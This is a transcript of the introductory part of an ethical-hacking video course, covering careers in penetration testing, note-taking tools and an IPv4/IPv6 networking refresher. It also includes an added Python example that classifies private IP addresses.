Transcript for:

hello everybody and welcome to this 12-hour edition of practical ethical hacking my name is heath adams and i'm going to be your instructor for this course a really quick who am i i am a husband ethical hacker teacher and when i have time gamer sports fan and animal dad i am the business owner at tcm security we are a cyber security consulting and education firm i do what is called ethical hacking meaning companies pay us to attempt to break into them it could be through a network wireless network a web application even physical pen testing like a building anything that they want us to try to hack into we're happy to do it and there's careers out here that involve ethical hacking it's actually a booming industry right now and a lot of people are coming into this industry from unique backgrounds like for example i was an accountant and i ended up in this industry and i've seen doctors dentists lawyers all kinds of random backgrounds that have just come to this industry and found homes here so if you're interested in ethical hacking this course is designed for you to kind of brush you into the basics help you understand what an ethical hacker does and some of the the techniques and it's going to be all hands-on i am not a powerpoint person whatsoever so this is the little bit of powerpoint that you're going to get at the beginning of the course and then we're going to get into heavy hands-on techniques so if you're interested in finding more out about me i am very approachable you can find me on linkedin on twitter here on youtube i would love if you hit the subscribe button comment uh hit the like let me know how you enjoyed the course and of course you can find me on twitch as well we do live streaming some ethical hacking streams some q a etc etc down below you see sites tcm security is the consulting side of the business the academy is the educational side and the certification side is the certification side so i'm going to cover that really quick and what this 
course is and what we're going to do in this course okay so welcome to practical ethical hacking this is 12 hours of 25 hours of a course so full disclosure this is not the complete course though this is a course that takes you through the first half and gets you to a good stopping point so reviewing the curriculum i'm going to scroll down here and i'm going to link everything in the description as well we're going to cover a few things in this course we're going to talk about note keeping we're going to go over computer networking and also python so if you've never used python or if you've never done anything with computer networking we're going to kind of cover that and so we'll cover some of the foundational skills before we get into ethical hacking and that does include note keeping and setting up a lab and installing linux and running through linux as well so we built all the foundations in this course before we start getting into ethical hacking so once we get through linux and python and we get through our computer networking we start getting into the ethical hacker methodology we talk about the five stages of ethical hacking and then we start getting into information gathering what information can we gather about our target we can look at social media we can look at finding email addresses finding intelligence about these companies or individuals or whoever it is that we are paid to target and we'll do that through information gathering and reconnaissance there's a bunch of different techniques that we can do then we'll move into the next phase which is scanning and enumeration we're going to have a intentionally vulnerable machine that's presented to us we're going to scan that with tools that you learn throughout the course identify what vulnerabilities might exist within the machine and then we're going to eventually start hacking it so we'll get into exploitation and talk about how we can hack a machine understand the basics of exploitation and then 
eventually hack a machine once that has all been said and done we're gonna go ahead and move into a capstone so we have uh four to five boxes actually five boxes that we have built ourselves and we allow you to download those you run through those and you try to attack those and your goal is to hack into these machines so you go through all these and that is your capstone your end to your 12 hours of your course now this is the only time i'm going to try to sell you anything is going to be the next 30 seconds to a minute if you are interested in continuing on with the course it does cover exploit development active directory which is probably the coolest thing ever it's my favorite thing to teach and how to hack into active director which you can see there's a lot of active directory attacks here we go into post exploitation we go into web application enumeration and the owasp top 10 web application attacks we do a little bit of wireless pen testing legal documentation report writing and career advice and we do sell all of our courses for 30 full disclosure we have about 12 courses at the time of this recording if we go to the home page we can see all of our courses here so we've got everything from linux and python all the way down to open source intelligence different types of pen testing and advanced pen testing mobile pen testing malware analysis phishing everything is no more than thirty dollars and that is the only time i'm going to sell you on anything again so last but not least we do have a certification side of things if you're interested in the certification this course it leads to the practical network penetration tester certification if you want to find out more about that and why that's cool and industry changing feel free to go to certifications.tcm dot and with that being said i am done pitching you selling you anything for the rest of this time being let's get into 12 hours of free material and start covering how to become an ethical hacker let's 
go ahead and get this course started before we dive into this course i want to talk about a day in the life of an ethical hacker and i want to talk about why i love ethical hacking or penetration testing and what i do on a day-to-day basis what kind of engagements you might find yourself in as an ethical hacker and then the soft skills and technical skills i think that you should have in order to be successful in this field so let's go ahead and first look at why pen testing so why pen testing why for me well i work from home i roll out of bed at like 7 55 in the morning i'll get my coffee ready i'll go to my desk i'll make it there by eight and i am ready to go i don't have to sit in traffic i don't have to drive to work i you know i save so much time out of my life just by working from home it's a great luxury i love the lifestyle it's not for everybody but a lot of penetration testing nowadays is working from home and another great thing about pen testing is the the salaries are incredibly high my first job in the field was over six figures meaning over a hundred thousand dollars in this field as a you know first-year pen tester uh so it's incredible money and it it's very lucrative moving up anywhere from uh a senior pentester can make a hundred and fifty thousand dollars a manager can make somewhere around 170 to 200 000 and really the sky's the limit especially if you go out and you do your own business or your own consulting uh the salaries are very very high because this is a very technical field and uh there there is a job shortage or people shortage right now we need we have more jobs than we have people so that relates to high salaries as well on top of that the benefits are great the work life balance is great again this boils down to where you work but for for me personally you know i'm working 40 hour weeks um my benefits are are have been fantastic through and through um and i just i love the lifestyle right that work from home that 40 hours a week i 
was an accountant before i got into penetration testing and let me tell you i was working 60 hour weeks seven hour weeks i was in the office at the all the time and i was you know i was going in when it was dark and i was coming home when it was dark and it just you know can easily lead to depression doing that i've not experienced any of that in penetration testing and i'm really really happy for it so on top of all this it is mentally stimulating this is one of the best fields i am what i consider a lifelong learner i like to learn i am non-stop learning right and i have that personality type and you're going to find that if you enjoy this field it's never going to feel like work to you i could sit here and i can pen test for 80 hours and it never feels like work to me it is just mentally stimulating it's a puzzle there's always something new to learn there's always a new attack out and there's always a new defense out as well so somebody's always trying to block your attacks and it's this cat and mouse game and if you do not stay up to date or on top of things you're going to get left behind so you have to have that mentality in this field where you're always willing to learn and you like learning and that's really like for me that's a positive to pen testing because i enjoy that and lastly of course it's legal breaking and entering who doesn't like that i get to break into buildings i get to break into websites into networks and people pay me to do it i cannot believe that this is a job when i first heard about it i was like no way hackers hackers are bad guys right but hackers can be good guys too and we can get paid very lucrative salaries so from here let's talk about a day-to-day lifestyle so day to day here what's guaranteed most basically should be guaranteed is that i roll out of bed i'm still relatively young and i have several different types of assessments that i can do and this really isn't all of them but this is the ones that i do the most now i 
have what is an external or internal network assessment and we're going to cover those quite a bit in this course but when we're talking external network assessment that means that i'm evaluating a network from the outside i could be i could be in china i can be the united states i could be in russia it doesn't matter where i'm attacking from right i can be in any country at any time attacking this network so i'm on the outside looking in the internal is different we assume at this point that we have breached the network we have a dropbox we've got some sort of code execution on their network we logged into their vpn it doesn't matter somehow some way we're on that network what can we do once we're inside the network and what that means is we're going to be talking a lot about active directory pen testing and that's really what it corresponds to and this course is going to hit very very heavy on active directory because of this and uh so you have two different types of network pen tests and they the methodology is very similar the attacks and tool sets are very different so they can almost be split apart into their own subsections but you will have external pen tests internal pen tests on the network side you may be asked to do web application penetration testing so that is assessing a website right you you have a website or an application that is given to you and you want to see if you can break that website if you can log in as an administrator or get somewhere that you you shouldn't be able to get to and you just want to evaluate the security posture of that website so there are a lot of tools and methodologies out there for that and we're going to cover the owasp top 10 in this course when we talk about that which is big when it comes to testing web applications so from there we also have what is called wireless penetration testing that is the evaluation of a wireless network so we'll go on site we'll try to hack into the wireless we'll look at the guest 
network and see if there's any segmentation or not should a guest be able to sign in and access the same network that somebody who is logged in as an employee should access the answer is no but it happens quite a bit we'll also look for rogue devices and see you know what might be out there that is interesting to us we'll talk more about all these different assessments when we get into their respective sections now there's also what is called physical or social or fishing there are three different types but they fall into social engineering now physical assessment is where you go on site and you try to break into a building you have a destination in mind maybe it's a server closet or you know some some critical location the building that they don't want you to get into this could involve picking locks social engineering a lot of the time uh cloning badges you know and just making your way into this building through whatever methodology you can now social engineering uh and fishing those are you know kind of hand in hand you'll do a phishing campaign or social engineering campaign or even a fishing where you're calling on the phone and you're trying to get information and you're just after you know what kind of credentials can i get who clicks on my links what kind of passwords do i get etc we also have what is called sock assessment so a soccer assessment is also known as purple teaming and purple teaming is when you combine red and blue so as a penetration tester or ethical hacker you're often known as red and a defender is often known as blue so you combine those and that makes purple and what that means is we'll sit down with a blue team as an offensive team we'll sit down with the blue team and we'll say hey what attacks do you want us to try to run or we're going to run these attacks and i want to know if you pick it up so i might run a specific attack and see if the blue team detects it i might go plug into their network and see if it prevents me from 
plugging into their network do they get an alert on that if not how can we help them baseline this attack to get this alert so i think purple teaming assessments are some of the best assessments that are out there because not only do they learn from you and what attacks are out there but you learn from them on how to defend against these and how to bypass these two because maybe your first attempt does get blocked and you're like hey maybe i should you know run a different attack and see if you catch that and it's a great way to have that cat and mouse game again so once we do these types of assessments we have to write a report we have to report back on what we saw and tell the client about it and i put a little sad face there because you know not everybody likes writing reports but it is absolutely part of the job you have to be well written in this field to be successful so you know you write this report and you're gonna have to present this report to a client and that's what is the debrief now debrief is where you take the report and you give it to a client and you walk through it with the client and say here's what's wrong here's why it's wrong and here's how we can fix that for you or here's how you can fix that right and so you have to have this technical skill set as a penetration tester and you have to have this well-written skill set you have to be able to write well you also have to be able to talk in front of people when it comes to doing debriefs and talk to people that doesn't mean you have to be an extrovert by any means you can be an introvert i am very introverted but you have to be able to put that personality on when you're on site same thing with the the physicals by the way if you're on site for a physical you do not have to be an extrovert to be successful i know plenty of good physical pen testers that are actually introverts and do just fine as long as you're able to get into that mindset for that temporary time period so anywhere from all 
these different assessments that you could end up doing at any given time you have to be well-rounded there you're going to be writing reports and you're going to be presenting reports to clients now let's talk about the technical skills that you are going to need and our course here is going to cover a lot of these so at a base level you really do need to know linux preferably kali linux or what another type was called parrot there is networking that you should know you should be familiar with the osi model certain protocols like tcp udp http etc you should have good scripting skills whether it be python scripting or bash scripting etc there and you should have a solid hacking methodology and this is all what we would want as a base for an interview you should have also tool familiarity right metasploit burp suite nessus if all this sounds like a foreign language to you that's fine come back and watch this video again once you've gone through the whole course and it's going to all click for you and you're going to say hey i know a lot of this and on the preferred side active directory is huge if you know active directory you're going to be ahead of the game most people when i interview them they have a good base but they don't have that good preferred side and we like we like the preferred column a lot okay so active directory super important wireless attacks important to know the owasp top 10 also important to know that is related to web application penetration testing and lastly coding skills so scripting and coding a little bit different scripting is what you'll be using primarily coding you don't have to be a coder to be successful in this field at all by the way if you only script for the rest of your life in this field you'll still find plenty of success however you can code new tools things you know contribute to the community with it we'll talk about that here in a second as well but just know that the base is possibly potentially can get you into a job to 
prefer it will definitely get you into a job if you have strong knowledge on that side along with the base knowledge lastly something that is not covered uh much is the soft skills that you need to be a pen tester so yeah it's great to be technical and we already talked about the the social people skills right because you're going to be doing that debriefing you might be doing social engineering etc and you're going to have to have that well-written ability to you as well but let's talk about some of these other ones you need a strong desire to learn you should be the type of person or that personality type that always wants to learn we talked about it right where you should be the guy or girl that wants to go home and study and you find this fascinating and you that desire to learn is going gonna benefit you because of that cat and mouse game because you know something that you knew yesterday might not be an exploit today you know patches are coming out all the time and you have to stay ahead of the game because of this cat and mouse game so that strong desire to learn super important if you do not stick up with your studies you're gonna get left behind and most people have this desire to be in the field of ethical hacking because they think it's sexy it sounds cool and is cool but if you do not have that desire to learn you do not have that that perseverance which we're going to talk about you're going to get left behind in this field and you're not going to be successful so let's move over to perseverance you have to have this perseverance mindset not with just that desire to learn but also that ability to not give up because the answer is not always there in front of you and you're going to see this as we go through the course it's not cut and dry it's not hey i scan for this i see an exploit i go exploit it you might have to do a lot of research it might look like the machine that you're attacking it has no exploits available to it and you have to be able to 
put in that persistence to be able to persevere you have to have that mindset where i'm not going to give up i'm going to keep trying at this until i have exhausted all my potential resources that is what makes a good hacker okay that mindset of i'm not going to quit really makes a good hacker now on top of that non-complacency this kind of falls into that strong desire to learn now i've had co-workers that are completely happy when i was working help desk when i was working in networking plenty of co-workers who are happy with their jobs they've been in the same position for five years 10 years you cannot be that person if you want to be a pen tester you always want to learn more you always want to move up you want to you want the most out of yourself okay don't be complacent if you're complacent you're going to get left behind just i'm beating the dead horse here but it really is true like you're going to get left behind if you're not constantly studying and if you stay complacent lastly you should have a blog or twitter or github or something that you contribute back to the community with it could be a youtube channel or twitch stream or however you want to do it right you should give back to the community when i see that somebody's giving back to the community on their resume even if it's a blog post or twitter whatever it really helps uh and things that you're gonna get asked in interview include where you get your news from or and how do you you know do you have a blog you're going to be asked that you know and twitter is a great place to get get news and a blog is a great place to give back and twitter is a great place to give back too so make sure you're contributing to your community it'll really help you in the long run and you don't have to reinvent the wheel it could be a blog that somebody's posted before or 20 people have posted before as long as you're posting it and your it helps you learn and it helps your style might be something that helps 
somebody else learn as well compared to the other blog posts where maybe people didn't like that writing style or they don't like that you know commentary or however it is so you never know how your content is going to help somebody else so i always encourage people to go out there and make their own content so that's it and i know this is a long video this is going to be longer than most the videos but i wanted to dive in and really cover what you can expect as an ethical hacker and what you need really at a technical and a soft skill level to be successful so from here we're going to go ahead and get right into the course next up is effective note keeping we're going to talk about the importance of note keeping what tools you should use to be keeping notes for this course and then we're going to dive right into the technical concepts so i'll catch you over in the next video so before we begin in this course and we really start to dive in it's important to cover one of the topics that i'm going to harp on the most which is effective no keeping if you're going to be successful in your career and you're going to be successful in this course you really need to take good notes now in this first video i'm going to show you what my notebook kind of looks like not only for my personal notebook but as a notebook for an assessment and how i might take notes for an assessment and then i'll also show you some note keeping applications that i prefer or i've heard students prefer in the second video we're going to cover how to install one of the applications and another cool application used for taking screenshots so let's take a look at my notebook first so here is my notebook and actually let's click over here so this is my notebook and you can see it's really long it's got all kinds of stuff in here and it's just something that i build upon this one in particular is actually only geared towards active directory so i have a few different notebooks this one is active 
directory and it's actually a few different courses that i've taken in the past that i've kind of put together and then just for assessment work etc i just kind of have a little cheat sheet here so i wanted to show you this one in particular because these were built off of courses and you're going to be working through a course so kind of just get an idea of how maybe to structure it so here you can see i structured it and i've got different modules here where okay module one might have had this email macro fundamentals module two two here has all these different uh components to them right and we have we have other notes then we have child notes and even sub children to those child notes and i'll show you how to create that here in a second but let's say for example enumeration which is one of the most important things that you're going to cover in hacking and we take a look at enumeration you don't have to understand what any of this means here but you could see if i want to look at a domain and i want to get the current domain that i'm on here's the command i run and here is a picture of what it looks like and here's what comes back when you run that command that's great that's what i want to see and i have a whole list of commands for all these in here right so if i'm confused on a assessment and i want to go and find a command that i'm not sure of i can go to my little cheat sheet here now again this is really long so you have to create your notes the way it really helps you for a course i think it's good to write it all out step by step like this and then go back and make a cheat sheet i don't need those pictures anymore i've been doing this for a while so maybe i just say hey get current domain is git net domain and then i say hey okay get object of another domain here's an example of it i don't need the pictures because it makes it really long but as an example and over time you learn with the pictures as well at least i do so let's build from that here is 
an example of an actual assessment that i did for a client and you can see how i did this now i did an external internal and web application assessment for this client and these were the findings now i'm only going to show you what is master obfuscated already or doesn't reveal client information but as you can see here one example is on the internal they had something called smb signing disabled you don't need to worry about it but here in my picture i've got a nice picture the picture has highlighted it says hey message signing disable that signifies smb signings disabled and it has the ip address so we identify the machine and we give proof of concept that this smb signing is disabled here another example ms-17010 these are both internal exploits that you're going to encounter in this course here's one i check this machine it says hey this target's not patched now this is one i didn't exploit but it shows that it's actually vulnerable to this attack so these are a couple screenshots that i'll put now your notes could be different than mine how i organize is i take a screenshot i put it in here and then i make sure that i have at least the ip address and the screenshot for reference because i'll remember it but if you need to go in here and take detailed notes that's absolutely fine as well you always want good notes for your assessments because you never know if a client's going to come back in six months or even a year and say hey what was that one thing that you did here and if you go back to your notes you say oh you know i did this and some people get down really into the weeds they have dates times everything for step by step what they do on an assessment and that's completely up to you and how well you take your notes this is kind of how i lay it out and then you see the green check marks next to it i add those green check marks when i'm doing my report so as i'm building my report out and i cover something in the report i'll just go ahead and right click 
and i'll change the note icon to a check mark meaning that i've written that part of the report for that finding and we just kind of go through over time so with that being said i do want to show you some decent applications the one that i'm using here and that you see is called keep no now i run on windows as a base so keepnote.org that's how you get keep note it is for linux it is for mac osx but this is totally a preference thing me i prefer i've been using it for a long time some people don't like it okay so i'm going to offer some alternatives as well cherrytree comes built into kali linux as you're going to see here in just a little bit worth looking at worth trying seeing if you like it onenote's another example if you use microsoft and if you're a mac user a lot of students have told me that joplin is really good now i've never used this but i keep hearing great things about it so what i'm going to do is i'm going to put all of these into the course resources and you'll be able to look at them download them decide on your own now you're not limited to these four note keeping applications by any means feel free to use whatever you like to take notes if you want pen and paper that's great as well and so just make sure that you're taking good notes and we're gonna we're gonna harp on this throughout the entire course over and over and over again so make sure you're taking good notes so from here what we're going to do is we're going to install keep note in the next video and we're going to install an awesome tool called green shot i'm going to show you what green shot does and why it's so cool and i cannot live on any assessment without it so let's catch you over in the next video when we work on installing those tools alright so in that example in the last video we talked about using keep note so if you go to google and you type in keep note all you got to do is come here and keep note works on windows linux and mac os x so great great tool the only issue 
with this tool is it has not been updated in a long time some people find issue with that if you're one of those people i'm actually not you can use other tools one note is an option cherry tree is also an option you can also find other options out there for you if you have a favorite note taking tool already that's absolutely fine as well just make sure to take good notes especially during this course and make the most of it learn all the things that you can and incorporate that so i will show you quickly how to install keep note here and another thing to note too is while we do this is cherry tree is available on kali linux we're going to install kali linux here very soon so once we install kali linux and we get into the introductory linux when we explore it i'll show you a little bit more of cherry tree and what that looks like and we'll talk pros and cons of cherry tree when we get there so here we go if you are on windows you can follow along or you download your appropriate one here depending if you're on linux or if you need mac as well so i'm going to go ahead and install the exe and i'm just going to actually run this we're just going to say yes and i'm going to say next next install and that's it that i mean it's that quick and then we just launch keep note and here you go we've got keep note so the other tool the really cool tool that i love this one is called green shot now this is a screenshot capturing tool so let's go to downloads here on green shot if you are running on something other than windows you're going or windows or mac so basically linux you're going to need a different tool the recommended tool that i've heard out there is called flame shot f f-l-a-m-e though i have no experience with it i've heard it is identical to green shot so here i'm going to download the latest stable i'm going to select run yes okay accept the agreement give away our firstborn next next next place it however you want i'm just going to next through everything and 
i'm going to start green shot with windows start that is my preference i love this tool again so it's finished all right let's take a look at it so it should be running let's start green shot now okay now you see it running down here on the bottom okay let's let's go let's open up a web page let's say we want to take a screenshot of something now you just hit your print screen button and this nice cursor gets brought up here and let's say we wanted to take this downloads part right here we're going to capture this and now we have choices we can just save the image that we just grabbed uh or my favorite is that we can actually open an image editor right so let's open this in their image editor look at this okay so here's the picture we just grabbed right on top of this really great tools let me show you two that i use always so i come into effects i put a border on it let's say that you have like a kali linux and kali linux if you've never used it has a black terminal it's really nasty so let's imagine here that it's black it's nasty when it comes to reporting so let's imagine that we're in this situation and we're writing a report and we've got this black background similar to this well you can see what i just did i just inverted it and i do this for all of my reports i invert the cali background so that way it's white and that way it looks nice on a report and when we get into the reporting you'll kind of see what that looks like but i like a nice clean background it saves on ink as well if they were to print it and it's just nice and neat when you give it to a client so i always invert my images if i need to you've got the black border here another thing is let's say you want to point something out you saw in my keep note notebook that i had a highlight you can just click that button up here and just highlight something like right here great another tool that's in here is this obfuscate so let's say that there's like a password or something really sensitive in 
here that you don't want the client to see, or that you don't want revealed on a final report. You can do that, and then you can just up the pixel size on this and make it really blurry. So it's a really, really great tool, and when you're done you can copy it to your clipboard or save the file. I usually just copy this, and if I want to go paste it, like make a new notebook or whatever, I'll just paste it in my KeepNote and go from there. So again, fantastic tool, awesome to use. If I had two recommendations for your note keeping, it's KeepNote and Greenshot; if I had to make one recommendation of the two, it's absolutely Greenshot. You can be flexible on your note-keeping tool. So again, hopefully this helps you. Again, again, again: please do take good notes for this course. You're going to find yourself wanting to know, hey, what was that command I ran again, because we're going to go through so much stuff by the time this is all said and done that you're going to want to remember it. So please take good notes. From here, let's go ahead and move on into our networking refresher, and we'll catch you in the next video.

Hello everyone and welcome to this section on networking. This section is titled Networking Refresher, meaning that some of you might have a networking background, and if you're looking at this list that's on the screen and you go down the list and say, yep, I know all those, you can feel free to skip this section. If you've taken some of these in the past and you just might want a little bit of a refresher on them, then this section is for you. We're going to cover these topics not totally in depth, but we're going to use it as a way to brush up, and then we'll hit on networking again when we get into introductory Linux. So if you are unfamiliar with things like TCP, UDP and the three-way handshake, or if your subnetting is a little shaky, or you don't know what the OSI model is, chances are you should probably stick around
and just click through this series, watch it and build that foundation. Remember, we talked about one of the core foundations of pen testing being a strong networking background; this is a good way to build it up, remember what you might have forgotten, and go from there. So let's go ahead and jump right into the first video, which is going to be IP addresses.

What's up everybody. I'm going to preface this video really quick with the fact that it is raining pretty hard here, so if the soothing sounds of the rain put you to sleep during this video and you can hear it, I'm very, very sorry, but the show must go on. What we're going to be doing today is talking about IP addresses. Now, if you've ever used a computer before and you're anyone familiar with it, you probably know what an IP address is, but I want to take this a little bit deeper in theory: why we use IP addresses, what types of IP addresses are out there, and talk more about protocols and how IP addresses are actually designed and made up. So I'm here in a Kali terminal and I'm just going to type in a simple command, and that command is ifconfig. If you've used Linux before this might be familiar to you; if you use Windows it's similar to ipconfig. All I'm trying to do is bring up my IP address. So we can see here that we have an IP address, which is our inet; this is my IP address here. I also have another IP address, this inet6; this is what's called an IPv6 address. So we've got this inet, which is considered IPv4, and this inet6, which is considered IPv6. Now you can notice right away that there are two different types of notation for these: this inet here is in decimal notation and the IPv6 is in hexadecimal notation. We'll get to the importance of that in just a second. So when it comes to IP addresses, this probably looks pretty familiar to us. This is an IP address; this is how we communicate. We communicate over layer three, and you're going to hear me talking about layers repeatedly throughout the
course, or at least throughout this part of the course, so that we can get familiar with how we're actually doing this. I want you to be familiar with troubleshooting these layers, and these layers all refer to something called the OSI model. So when we talk about layers we think about the OSI model, and I'll introduce the OSI model here in a few videos; it should all click once I introduce it. If I brought in the OSI model up front it might be boring, might not make sense, so I'm going to introduce the OSI model near the end and you're going to say, hey, yeah, that all makes sense. So what we've got here is this IPv4 address, and this is the most commonly used format that we use today, right? We use IPv4 for mostly everything, and again, this is in that decimal notation. When we see this decimal notation, it's realistically just a bunch of ones and zeros that are put together so that we have this human-readable format. Realistically, all we're seeing here with 192, this first section here, this first octet, is actually just a bunch of ones and zeros; it's eight bits. So we've got a range of eight ones and zeros here, we've got another eight here, eight here and eight here. When it's all said and done, this inet, or this IPv4, is made up of 32 bits, eight plus eight plus eight plus eight, which equals four bytes. Another way to think about that is something like this: one two three four five six seven eight, period. Okay, that is one section there, so we've got eight ones that can make up this, and then we'd have another eight, etc. I'm not going to beat a dead horse here, but I do want to give you guys another example. So if we go into our applications and go to a text editor really quick, the way this looks is something like this. We start with a number like 128. I'm going to try to space this out as best as possible, and all I like to do is think of 128 as my base, and this will make a lot more sense when we get into
subnetting. So please, if you're confused by this, don't worry; this is all theory right now. When we get into subnetting and get hands-on it'll make a lot more sense, I promise you. So let's say we have ones and zeros here. If we have a one for each of these sections, and I'm going to space this out again as best as possible, it's not pretty, but if we have a one for all of these, this equals 255. Why does this equal 255? Well, you take this and all these numbers add up: 1 plus 2 plus 4 plus 8, all this adds up to 255. So let's say we didn't have all ones; we had just some ones enabled, like these last three here. Okay, well this would equal seven, because we have four plus two plus one equals seven. So our first number, or whatever number this applied to in the octet, would be 7. So if we had 7.7.7.7 it would just be these numbers repeating over and over, right? So 00000111.00000111 and so forth. This is kind of what it looks like behind the scenes, because again, a computer is just ones and zeros; we're all binary. So what we're going to do is close this out and talk a little bit of other theory when it comes to this, and why inet6 or IPv6 and why IPv4. So let's close this and talk about IPv4. I'm going to bring up a calculator. With IPv4 we have these 32 bits, so what we can do is take 2 to the 32nd power, and this is the possible amount of IP addresses that we could have. So we have somewhere in the 4 billion range of IP addresses. Well, spoiler alert, we don't have only 4 billion people on earth, right? We're up to 7-something billion at this point, and all these IP address spaces are gone. IPv4 has been around since 1981; nobody thought we were ever going to use all these addresses. Computers weren't really a thing. Who knew that we were going to want all these addresses? And these companies started buying them up, and they started buying them up in large chunks, and then they sold those to ISPs
and then ISPs sell those to you. So these IP addresses have been gone for a very, very long time, and chances are when you have an IP address and you get this IPv4, you're only going to get one; if you're a corporation you might buy more, but we've run out of IP address space. There's just not enough to go around. So the theory is, okay, let's come up with something different, let's come up with IPv6. Now, this hexadecimal is actually 128 bits, which makes things just a little bit longer and adds quite a bit. So let's take 2 to the 128th power, and we get a number that I cannot tell you how to say, not even going to try, but I can guarantee you that in our lifetime we will never use this address space. So we've come up with a solution, IPv6, but nobody really uses it. IPv6 is just a thing that's there; we get IPv6 addresses assigned, but still to this day everybody's using IPv4. Well, how is that possible, if we're using IPv4 but we're out of address space? Think about this: we're using something called NAT, which is network address translation. Let's think about your network. You might have a cell phone or computer or multiple devices. My network has at least 20 devices on it: I've got cameras, I've got multiple cell phones, smart TVs, everything that connects to my internet gets an IP address, and that's 20 IP addresses right there, right? So let's say I have 20 devices, that's 20 IP addresses. Am I taking up 20 IP addresses out of that 4 billion? No. We're actually using something called network address translation, or NAT for short, and we'll talk about this again when we set up our actual lab. But with NAT, what we're doing is we're assigned these private IP address spaces. So we've got this 192.168.57.139. Now, if you've ever seen an IP address before and you've been on a network, good chances are it probably started with 192, or maybe it started with a 10-dot or something along those lines, and that's because those are private IP
addresses. So anything that starts with 192.168 is not an IP address that is going to be out on the interwebs; it is going to be an IP address that is only known to you. These are called private IP addresses. Because we use these private IP addresses, we can pass them out through what is called a public IP address. Now, to make better use of this, let's go out to Firefox. I've already got a tab open; I went to Google and I just searched private IP addresses, and I clicked the second image here because I think it's a great image. So if we look at this, there are classes of IP addresses, private IP addresses. Now there is a class D and E; we're not going to worry about those. The big three are class A, B and C. If you know these you are good to go. So if we look at class C, this is what the most common household and small business use. We see it starts at 192.168.0.0, so the 192.168 is constant; if you see a 192.168 address you can guarantee yourself that that is a private IP address space. And then we have the range of changing this number between 0 and 255 and this number between 0 and 255.
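As an added example (not code from the course), the octet arithmetic from the text-editor demo and the private-address rules just described, done by hand in Python so the bits stay visible. The 172.16.0.0/12 block is the standard class B private range from RFC 1918, included for completeness; 192.168.57.139 is the Kali address shown in the lecture and the other sample addresses are constructed.

```python
# Added example, not the course's own code: the octet bit arithmetic and the
# private-address rules described in the lecture, implemented by hand.
import ipaddress  # standard library, used only to cross-check the hand-rolled result

# Column values of the eight bits in one octet: "128 as my base", then keep halving.
BIT_VALUES = (128, 64, 32, 16, 8, 4, 2, 1)


def octet_to_bits(value: int) -> str:
    """One octet (0-255) as its eight bits, e.g. 7 -> '00000111', 255 -> '11111111'."""
    if not 0 <= value <= 255:
        raise ValueError(f"octet out of range: {value}")
    return "".join("1" if value & v else "0" for v in BIT_VALUES)


def bits_to_octet(bits: str) -> int:
    """Add the column values of the switched-on bits: '00000111' -> 4 + 2 + 1 = 7."""
    if len(bits) != 8 or set(bits) - {"0", "1"}:
        raise ValueError(f"expected eight 0/1 characters, got {bits!r}")
    return sum(v for b, v in zip(bits, BIT_VALUES) if b == "1")


def ipv4_to_bits(address: str) -> str:
    """Dotted quad -> the 32 bits behind it, grouped per octet (4 x 8 bits = 4 bytes)."""
    parts = address.split(".")
    if len(parts) != 4:
        raise ValueError(f"not a dotted quad: {address!r}")
    return ".".join(octet_to_bits(int(p)) for p in parts)


def bits_to_ipv4(bits: str) -> str:
    """Inverse of ipv4_to_bits: '00000111.00000111.00000111.00000111' -> '7.7.7.7'."""
    return ".".join(str(bits_to_octet(group)) for group in bits.split("."))


def address_space(bit_length: int) -> int:
    """Distinct addresses for a given width: 2**32 for IPv4, 2**128 for IPv6."""
    return 2 ** bit_length


def classify_ipv4(address: str) -> str:
    """Private (RFC 1918), loopback or public, decided on the leading octets.

    The 172.16.0.0/12 block is the 'class B' private range; the lecture only
    names the 10.x and 192.168.x blocks, so it is listed here for completeness."""
    first, second, *_ = (int(p) for p in address.split("."))
    if first == 10:
        return "private:10.0.0.0/8"
    if first == 172 and 16 <= second <= 31:
        return "private:172.16.0.0/12"
    if first == 192 and second == 168:
        return "private:192.168.0.0/16"
    if first == 127:
        return "loopback:127.0.0.0/8"
    return "public"


def agrees_with_stdlib(address: str) -> bool:
    """Cross-check: a non-public verdict above should match ipaddress.is_private."""
    ours = classify_ipv4(address) != "public"
    return ours == ipaddress.ip_address(address).is_private


if __name__ == "__main__":
    # 192.168.57.139 is the address shown in the lecture; the rest are constructed samples.
    samples = ("192.168.57.139", "7.7.7.7", "10.1.1.1", "172.20.0.9", "127.0.0.1", "74.125.21.155")
    for addr in samples:
        print(f"{addr:>15}  {ipv4_to_bits(addr)}  {classify_ipv4(addr)}"
              f"  stdlib agrees: {agrees_with_stdlib(addr)}")
    print("IPv4 address space:", address_space(32))
    print("IPv6 address space:", address_space(128))
```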
Why 0 to 255? Well, that'll all make sense when we get into subnetting, but what that allows us to do is have a large number of networks here and a small amount of hosts. For a regular user like you or I, or a small business, 254 hosts is pretty good; I mean, I'm only using like 20 in my household. So the most common household is probably using this 192 address. But what about a big, big business, right, something huge? Okay, well they might use a 10 address, because a 10 address frees you up: anything after this 10 is private. So 10.1, 10.1.1.1, whatever you want to put in here up to 255 on each octet, makes for a small amount of networks but a large amount of hosts. And don't worry about the host versus network thing; again, subnetting, we'll talk about that, it'll all make sense. But just imagine the amount of hosts that you can put in here with this wide range. Because of this you'll see larger corporations using 10 addresses; you'll also see a lot of corporations, even small businesses, using 10 addresses. The matter of fact is, as long as you have this private IP address you're good to communicate across your network. So any IP address outside of these and the loopback here are free game for the public address space. They're probably already owned, and you purchase those, or rent those really, from your ISP, your internet service provider. So going back to this thought, we have a class C address. My network's class C, 192.168.57.139 here, so it falls into that class C. I've got all these devices on this 192.168 network, and all these devices are talking out of one IP address. That is my public IP address, that is what I rent from my ISP, and all this network traffic goes out one IP. So this is how we have achieved, or solved, the issue of running out of address space without having to use IPv6. Not that there's anything wrong with IPv6; it's not pretty, I mean, it's way easier to type this stuff in than it would be to type something like this in, but at the same time this is how we've
solved it. We're able to still use IPv4 in mostly all networks, and we are able to communicate out with this quote-unquote IP address shortage. So hopefully that makes sense. We're going to build upon these concepts again: IPv4, IPv6, IP addresses are layer 3 protocols. Layer 3 is a router, so when we route traffic we route via an IP address. We're going to build upon that as well as we go in; hopefully this is all just a refresher to you. So that is it for this video. I'll go ahead and catch you over in the next one.

